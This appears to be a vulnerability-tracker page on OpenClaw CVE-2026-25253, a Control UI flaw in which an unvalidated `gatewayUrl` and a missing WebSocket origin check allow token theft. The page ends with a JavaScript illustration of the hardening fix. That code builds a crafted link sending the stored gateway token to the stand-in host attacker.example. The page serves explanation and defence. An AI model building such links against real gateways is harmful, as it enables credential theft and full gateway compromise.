OpenClaw Control UI crafted-link RCE (CVE-2026-25253)
Vulnerability
Summary
OpenClaw CVE-2026-25253 is a high-severity 1-click RCE flaw that can expose gateway tokens and enable full gateway compromise on impacted instances. The weakness sits in the Control UI, which trusts `gatewayUrl` from the query string without validation and fails to check the WebSocket origin. A crafted malicious link or malicious page can trigger token theft and privileged gateway access. The issue was fixed in version 2026.1.29.
Related Happenings
OpenClaw ClawJacked localhost WebSocket brute-force security flaw
Vulnerability
First: 01.03.2026 23:44
Last: 01.03.2026 23:44
Sources 1
About this happening:
**OpenClaw**’s **ClawJacked** vulnerability allowed a **malicious website** to brute-force a **localhost WebSocket** connection and take control of a local instance, putting **ses...
BeaverTail and InvisibleFerret backdoor delivery via malicious VS Code task abuse
Malware Activity
First: 20.01.2026 20:41
Last: 20.01.2026 20:41
Sources 1
About this happening:
**North Korean** threat actors tied to **Contagious Interview** are using **malicious Visual Studio Code (VS Code) tasks** and injected code in **compromised developer repositorie...
Latest development: 22.04.2026 17:48
North Korean actor Void Dokkaebi, aka Famous Chollima, is turning the Contagious Interview fake-job lure into a self-propagating software supply-chain infection that abuses compromised developer repositories, malicious VS Code tasks, and injected code to spread malware and steal credentials. The campaign targets developers seeking work, can hide a poisoned .vscode folder in committed code, and Trend Micro said it found more than 750 infected code repositories, more than 500 malicious VS Code task configurations, and 101 commit-tampering instances in March.
Timeline
02.02.2026 18:28 · 1 article · 3mo ago
OpenClaw releases fix for CVE-2026-25253
Mitigation Patch Update: OpenClaw released version 2026.1.29 on January 30, 2026 to address CVE-2026-25253, a high-severity flaw tied to crafted malicious links, token exfiltration, full gateway compromise, and 1-click RCE against the Control UI and gateway API.
Sources
- OpenClaw Bug Enables One-Click Remote Code Execution via Malicious Link — thehackernews.com — 02.02.2026 18:28
02.02.2026 18:28 · 2 articles · 3mo ago
OpenClaw discloses Control UI one-click RCE
Initial Disclosure: OpenClaw publicly disclosed CVE-2026-25253 on February 2, 2026, describing a Control UI flaw where `gatewayUrl` from the query string is trusted without validation and the WebSocket origin is not checked, allowing a crafted malicious link or malicious web page to steal the stored gateway token, bypass authentication, and reach operator-level access and code execution on the gateway host.
Sources
- OpenClaw Bug Enables One-Click Remote Code Execution via Malicious Link — thehackernews.com — 02.02.2026 18:28
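To make the two missing checks concrete, here is an added illustration in JavaScript. It is not OpenClaw's code and does not claim to match the real Control UI or gateway: the port 18789, the allowlists and every function name are assumptions. It contrasts the vulnerable `gatewayUrl` handling that the summary and the disclosure entry above describe with an allowlist-based replacement, and adds the Origin check the gateway side should perform on the WebSocket upgrade before it even looks at a token.

```javascript
// Added illustration of the two missing checks described on this page.
// NOT OpenClaw's code: the port, the allowlists and the function names are assumed.

// Assumption: the gateway only ever lives on the local host at this port.
const GATEWAY_PORT = 18789;
const TRUSTED_GATEWAY_ORIGINS = new Set([
  `ws://127.0.0.1:${GATEWAY_PORT}`,
  `ws://localhost:${GATEWAY_PORT}`,
]);
// Assumption: the Control UI is served by the gateway itself, so these are the
// only page origins that may open a browser WebSocket to it.
const TRUSTED_PAGE_ORIGINS = new Set([
  `http://127.0.0.1:${GATEWAY_PORT}`,
  `http://localhost:${GATEWAY_PORT}`,
]);

// Vulnerable pattern (what the advisory describes): whatever the query string
// says is where the UI will connect and send the stored gateway token.
function pickGatewayUrlVulnerable(pageHref, fallbackUrl) {
  const fromQuery = new URL(pageHref).searchParams.get("gatewayUrl");
  return fromQuery || fallbackUrl;
}

// Hardened: the parameter is only a hint. It must parse, use ws/wss, and land on
// an allowlisted gateway origin; anything else silently falls back.
// Comparing the parsed origin (not a string prefix) also defeats userinfo tricks
// such as ws://127.0.0.1:18789@attacker.example, whose origin is the attacker host.
function pickGatewayUrlHardened(pageHref, fallbackUrl) {
  const fromQuery = new URL(pageHref).searchParams.get("gatewayUrl");
  if (!fromQuery) return fallbackUrl;
  let candidate;
  try {
    candidate = new URL(fromQuery);
  } catch {
    return fallbackUrl; // not a URL at all
  }
  if (candidate.protocol !== "ws:" && candidate.protocol !== "wss:") return fallbackUrl;
  if (!TRUSTED_GATEWAY_ORIGINS.has(candidate.origin)) return fallbackUrl;
  return candidate.href;
}

// Gateway side: the Origin header on a WebSocket upgrade. Browsers always send
// it, so a present-but-untrusted Origin means a third-party page is driving the
// connection and must be refused regardless of any token it later presents.
// An absent Origin means a non-browser client (CLI, script); it still needs the
// token, but it is not a web page that could have been lured into connecting.
function originAllowed(upgradeHeaders) {
  const origin = upgradeHeaders["origin"]; // Node lowercases incoming header names
  if (origin === undefined) return true;
  return TRUSTED_PAGE_ORIGINS.has(origin);
}

// Which host would receive the stored token for a given link? Lets the
// crafted-link case be seen without opening a real socket.
function tokenDestination(pageHref, picker) {
  const fallbackUrl = `ws://127.0.0.1:${GATEWAY_PORT}`;
  return new URL(picker(pageHref, fallbackUrl)).host;
}

// Constructed crafted link: the legitimate UI page with an attacker-chosen gateway.
const CRAFTED_LINK =
  `http://localhost:${GATEWAY_PORT}/?gatewayUrl=wss://attacker.example/ws`;

console.log("vulnerable UI sends token to:", tokenDestination(CRAFTED_LINK, pickGatewayUrlVulnerable));
console.log("hardened UI sends token to: ", tokenDestination(CRAFTED_LINK, pickGatewayUrlHardened));
console.log("upgrade from attacker page allowed?", originAllowed({ origin: "https://attacker.example" }));
```

Run it with `node` and the first line prints `attacker.example`, the second `127.0.0.1:18789`, the third `false`. Two design points matter beyond the toy: the UI-side check compares a parsed origin against an allowlist rather than pattern-matching the raw string, and the gateway-side Origin check is a browser defense only; it is the token, not the Origin header, that authenticates non-browser clients, which is why the advisory treats token exposure as full gateway compromise.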